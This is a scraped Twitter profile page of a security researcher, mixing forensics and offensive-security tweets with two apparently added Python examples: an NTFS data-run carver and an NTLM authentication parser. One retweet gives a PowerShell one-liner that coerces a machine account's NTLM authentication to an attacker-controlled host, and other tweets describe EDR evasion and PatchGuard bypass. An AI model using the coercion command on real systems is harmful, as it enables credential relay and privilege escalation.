Naacbin (@naacbin)'s Twitter Profile
Naacbin

@naacbin

Maldev, forensic and reverse makes me happy.

ID: 1048638572956450816

Website: https://naacbin.gitlab.io/
Joined: 06-10-2018 18:18:13

160 Tweets

164 Followers

159 Following

k1nd0ne (@k1nd0ne):

Time to make Volatility 3 compatible with modern Windows hibernation file analysis. Blog post: forensicxlab.com/posts/hibernat… Feature: tinyurl.com/5n8u4nr9 Special thanks to Chad Tilbury, who gave me the motivation, and to Joe Sylve 🐘, Vico Marziale and Golden G. Richard III for the incredible work.

Naacbin (@naacbin):

I have written 2 writeups for #ECSC2023 and #DGhAck. For the 2nd one, I used github.com/naacbin/Covena…
[1] Recovering a PDF using the DataRuns in $LogFile > naacbin.gitlab.io/data-on-the-ru…
[2] Decrypting Empire C2 communication by extracting the private key from memory > naacbin.gitlab.io/empire-c2/
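The first writeup above recovers a deleted PDF from the data runs recorded in $LogFile. The block below is an added example, written for this page and not taken from naacbin's writeup or from the repository linked in the tweet: it decodes an NTFS data-run list into (start cluster, length) pairs, handling the signed relative offsets and sparse runs, and then carves a file out of a raw volume image from those runs. Finding the runs inside $LogFile records is out of scope here. The first test vector is the widely reproduced three-run example from the Linux-NTFS documentation; the tiny 4-cluster "image" and its run list are constructed inline.

```python
from __future__ import annotations


def decode_data_runs(runs: bytes) -> list[tuple[int | None, int]]:
    """Decode an NTFS data-run list into (start_cluster, length_in_clusters) pairs.

    Each run begins with a header byte: the low nibble is the size of the
    length field, the high nibble the size of the offset field (0 = sparse
    run, no clusters on disk). Offsets are little-endian, signed and relative
    to the start of the previous run. A 0x00 header terminates the list.
    Sparse runs are returned with start None.
    """
    out: list[tuple[int | None, int]] = []
    pos = 0
    lcn = 0                                  # running absolute cluster number
    while pos < len(runs):
        header = runs[pos]
        pos += 1
        if header == 0:
            break
        len_size = header & 0x0F
        off_size = header >> 4
        if len_size == 0 or pos + len_size + off_size > len(runs):
            raise ValueError(f"malformed data run at byte {pos - 1}")
        length = int.from_bytes(runs[pos:pos + len_size], "little")
        pos += len_size
        if off_size == 0:
            out.append((None, length))       # sparse run: no offset field at all
            continue
        delta = int.from_bytes(runs[pos:pos + off_size], "little", signed=True)
        pos += off_size
        lcn += delta                         # relative to previous run start
        out.append((lcn, length))
    return out


def carve_runs(image: bytes, runs: bytes, cluster_size: int,
               real_size: int | None = None) -> bytes:
    """Reassemble file content by reading each run from a raw volume image.

    Sparse runs are zero-filled; real_size (the attribute's real size) trims
    the slack in the final cluster.
    """
    data = bytearray()
    for start, length in decode_data_runs(runs):
        nbytes = length * cluster_size
        if start is None:
            data += b"\x00" * nbytes
            continue
        off = start * cluster_size
        chunk = image[off:off + nbytes]
        if len(chunk) != nbytes:
            raise ValueError("run extends past the end of the image")
        data += chunk
    return bytes(data if real_size is None else data[:real_size])


# Classic three-run example (Linux-NTFS docs): runs at 0x342573, 0x363758, 0x393802.
CLASSIC_RUNS = bytes.fromhex("31 38 73 25 34 32 14 01 E5 11 02 31 42 AA 00 03 00")

# Constructed 4-cluster "volume" (16-byte clusters) holding a fragmented PDF:
# the head lives in cluster 2, the tail in cluster 1, so the second run has
# a negative relative offset (0xFF == -1).
CLUSTER = 16
_IMAGE = (
    b"\x00" * CLUSTER                                   # cluster 0: unrelated
    + b"%%EOF\n".ljust(CLUSTER, b"\x00")                # cluster 1: PDF tail
    + b"%PDF-1.7\n1 0 obj".ljust(CLUSTER, b"\x00")      # cluster 2: PDF head
    + b"\xff" * CLUSTER                                 # cluster 3: unrelated
)
_PDF_RUNS = bytes.fromhex("11 01 02" "11 01 FF" "00")   # +2 clusters, then -1


def recover_sample() -> bytes:
    """Carve the constructed PDF (real size 22 bytes) from the constructed image."""
    return carve_runs(_IMAGE, _PDF_RUNS, CLUSTER, real_size=22)


if __name__ == "__main__":
    for start, length in decode_data_runs(CLASSIC_RUNS):
        print(f"start LCN {start:#x}, {length} clusters")
    print(recover_sample())
```

With a real image, replace `_IMAGE` by a memory-mapped volume and `CLUSTER` by the bytes-per-cluster value from the boot sector; the run bytes come from the $DATA attribute copy found in the $LogFile record.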

Fox-IT (@foxit):

Read our latest blog to find out how our Security Research Team reverse-engineered Windows Defender to uncover previously undocumented artefacts, which can now be recovered using Dissect! blog.fox-it.com/2023/12/14/rev…

Charlie Bromberg « Shutdown » (@_nwodtuhs):

Exegol holiday release is live 🎄🎁🎅 New remote graphical desktop, image entrypoint, container startup script, new tools, improved pipeline, doc, etc. Many big things! github.com/ThePorgs/Exego… github.com/ThePorgs/Exego… gg to the team Dramelac qu35t 👏 and all contributors.

an0n (@an0n_r0):

OST cannot be stopped. Here is a technique we tested internally 9 months ago: blocking EDR telemetry by leveraging the Windows Filtering Platform. We considered it so evil that we didn't publish it at the time. That was pointless; now here it is, by Chris Au: github.com/netero1010/EDR…

Mayfly (@m4yfly):

Did you know you don't need a Potato exploit to go from an IIS AppPool account to admin or SYSTEM? Simply use:
powershell iwr http://192.168.56.1 -UseDefaultCredentials
to get an HTTP coerce of the machine account. 👇🧵

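The tweet above coerces the machine account's HTTP authentication from an IIS AppPool identity with `iwr -UseDefaultCredentials`, aimed at an attacker-controlled listener (192.168.56.1 in the tweet). The block below is an added example, mine rather than Mayfly's, and does not perform the coerce itself: it parses the NTLM AUTHENTICATE_MESSAGE (Type 3) that the listener receives in the `Authorization: NTLM <base64>` header, so you can confirm which principal actually authenticated. A user name ending in `$` is a machine account, and an NtChallengeResponse longer than 24 bytes is NTLMv2. The sample header is built in the block from a constructed message; the domain `LAB`, host `WEB01` and the response bytes are made up.

```python
import base64
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLM_AUTHENTICATE = 3
NEGOTIATE_UNICODE = 0x00000001
# signature(8) + type(4) + six 8-byte field descriptors(48) + flags(4) + version(8) + MIC(16)
HEADER_LEN = 88
MIN_LEN = 64      # we need at least the NegotiateFlags field at offset 60


def build_authenticate(domain: str, user: str, workstation: str,
                       nt_response: bytes, flags: int = NEGOTIATE_UNICODE) -> bytes:
    """Assemble a minimal AUTHENTICATE_MESSAGE (constructed test data, not a capture)."""
    payload = bytearray()
    descriptors = bytearray()

    def add(data: bytes) -> None:
        # Field descriptor: Len, MaxLen, absolute offset of the data in the message.
        descriptors.extend(struct.pack("<HHI", len(data), len(data), HEADER_LEN + len(payload)))
        payload.extend(data)

    add(b"\x00" * 24)                       # LmChallengeResponse (zeroed here; ignored)
    add(nt_response)                        # NtChallengeResponse
    add(domain.encode("utf-16-le"))         # DomainName
    add(user.encode("utf-16-le"))           # UserName
    add(workstation.encode("utf-16-le"))    # Workstation
    add(b"")                                # EncryptedRandomSessionKey (absent)
    header = (NTLMSSP_SIGNATURE + struct.pack("<I", NTLM_AUTHENTICATE) + bytes(descriptors)
              + struct.pack("<I", flags) + b"\x00" * 8 + b"\x00" * 16)   # Version, MIC
    return header + bytes(payload)


def _field(msg: bytes, off: int) -> bytes:
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, off)
    if offset + length > len(msg):
        raise ValueError("field descriptor points outside the message")
    return msg[offset:offset + length]


def parse_authenticate(msg: bytes) -> dict:
    """Extract the authenticating principal from an NTLM Type 3 message."""
    if len(msg) < MIN_LEN or msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("missing NTLMSSP signature")
    if struct.unpack_from("<I", msg, 8)[0] != NTLM_AUTHENTICATE:
        raise ValueError("not an AUTHENTICATE_MESSAGE (type 3)")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "cp437"   # OEM strings otherwise
    nt_resp = _field(msg, 20)
    user = _field(msg, 36).decode(enc)
    return {
        "domain": _field(msg, 28).decode(enc),
        "user": user,
        "workstation": _field(msg, 44).decode(enc),
        "nt_response_len": len(nt_resp),
        "ntlmv2": len(nt_resp) > 24,          # NTLMv1 responses are exactly 24 bytes
        "machine_account": user.endswith("$"),
    }


def from_authorization_header(value: str) -> bytes:
    """Decode the token from an 'Authorization: NTLM <base64>' header value."""
    scheme, _, token = value.strip().partition(" ")
    if scheme.upper() != "NTLM" or not token:
        raise ValueError("not an NTLM Authorization header")
    return base64.b64decode(token)


# Constructed header as the listener would see it after the coerce.
SAMPLE_HEADER = "NTLM " + base64.b64encode(
    build_authenticate("LAB", "WEB01$", "WEB01", bytes(range(48)))).decode()


def demo() -> dict:
    return parse_authenticate(from_authorization_header(SAMPLE_HEADER))


if __name__ == "__main__":
    print(demo())
```

The parser follows the field descriptors' absolute offsets rather than assuming a fixed payload start, so it also handles messages from older clients that omit the Version or MIC fields.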
Kévin GERVOT (Mizu) (@kevin_mizu):

Challenge time is now over ⏰
TL;DR
- HTML injection
- Axios DOM-based CSPP
- Axios CSPP response overwrite gadget
- jQuery DOM clobbering + CSPP selector overwrite gadgets
- Setting src attr to "javascript:" for each HTML node ➝ XSS
Detailed writeup 👇 mizu.re/post/intigriti…

DebugPrivilege (@debugprivilege):

I did two write-ups about ETW. The first one covers how to capture an ETW trace and includes a case study using the WinInet provider to analyze Cobalt Strike. The second one covers how EDRs use the DotNetRuntime ETW.
1. github.com/DebugPrivilege…
2. github.com/DebugPrivilege…

Ange (@angealbertini):

I documented github.com/corkami/docs/b… and made 'low alignment PEs' (PoCs @ github.com/corkami/pocs/b…) around 2009, but I'm pretty sure this was known before. Any early case of an ITW low-align PE? cc @Hexacorn qkumba hasherezade ReWolf

Naacbin (@naacbin):

Over the past few months, I've contributed to the github.com/mandiant/VM-Pa… repository to incorporate forensic packages. As a result, I've developed scripts to automate VM installation for reverse, maldev and forensic purposes. 👇 github.com/naacbin/SecLab

Elliot (@elliotkillick):

I just spent the last few months of my life reverse engineering the Windows 10 parallel loader and figuring out how it does concurrency. Updates have now been published! github.com/ElliotKillick/…

Mayfly (@m4yfly):

New lab 🏰 for the GOAD project 🥳: SCCM. You can now test the SCCM/MECM attacks locally on VirtualBox or VMware. More information here: mayfly277.github.io/posts/SCCM-LAB… Repository here: github.com/Orange-Cyberde… Thx again Kenji Endo for your help building this!

k1nd0ne (@k1nd0ne):

Exciting news: VolWeb 2.0 is out! This digital forensics memory analysis platform leverages the capabilities of the Volatility 3 framework. With significant enhancements, it now offers improved flexibility and scalability! github.com/k1nd0ne/VolWeb 1/8

Geebz (@gbps111):

I just published the long-awaited Part 2 to my PCIe blog post series - "All About Memory: MMIO, DMA, TLPs, and more!" This post also includes a companion experiment where I dive into what pcileech looks like over a PCIe protocol analyzer. Please enjoy! ctf.re/kernel/pcie/tu…

Ali Hadi | B!n@ry (@binaryz0ne):

Here is my #Friday #giveaways! Like, retweet and share with your network... On Monday 4/1 I'll randomly choose two winners to get the full "C5W Certified Malware Analysis" course and certification for FREE... You should not miss this! #DFIR #Malware academy.cyber5w.com/courses/C5W-Ce…

Nathan Blondel (@slowerzs):

I wrote a blogpost on injecting code into a PPL process on Windows 11, without abusing any vulnerable driver. blog.slowerzs.net/posts/pplsyste…

S3cur3Th1sSh1t (@shitsecure):

Didn't check the code yet, but it looks like SilverPotato and CertifiedDCOM have a working public weaponized tool by now: github.com/CICADA8-Resear… That's huge news from my perspective 🔥

Can Bölük (@_can1357):

Excited to share my latest article: PgC - a novel approach to disable Patchguard during runtime using basic memory management principles. It has worked against every version of Patchguard for the last 7 years, without needing any updates! blog.can.ac/2024/06/28/pgc…

5pider (@c5pider):

I haven't posted anything about Havoc in a while so imma share something I have been working on. Wrote a custom VM/Interpreter (based on the RISC-V instruction set) to execute exploits and other arbitrary code. The client is now fully extendable and scriptable via the Python API
